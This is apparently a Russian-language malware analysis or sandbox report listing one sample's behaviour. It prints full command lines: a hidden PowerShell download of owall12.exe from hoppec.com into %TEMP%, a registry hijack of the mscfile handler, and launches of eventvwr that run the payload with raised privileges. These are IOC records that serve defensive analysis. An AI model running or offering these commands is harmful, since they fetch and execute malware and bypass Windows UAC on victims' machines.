Техническая информация
- http://hoppec.com/scan08/owall12.exe как %temp%\\owall12.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://hoppec.com/scan08/owall12.exe','%TEMP%\\owall12.exe') & reg add HKCU\\Software\\Classes\\mscfi...
- %TEMP%\owall12.exe
- nul
- 'ho##ec.com':80
- http://ho##ec.com/scan08/owall12.exe
- DNS ASK ho##ec.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://hoppec.com/scan08/owall12.exe','%TEMP%\\owall12.exe') & reg add HKCU\\Software\\Classes\\mscfi...' (со скрытым окном)
- '<SYSTEM32>\mmc.exe' "<SYSTEM32>\eventvwr.msc"' (со скрытым окном)
- '<SYSTEM32>\reg.exe' add HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /d %TEMP%\\owall12.exe /f
- '<SYSTEM32>\eventvwr.exe'
- '<SYSTEM32>\mmc.exe' "<SYSTEM32>\eventvwr.msc"
- '<SYSTEM32>\ping.exe' -n 15 127.0.0.1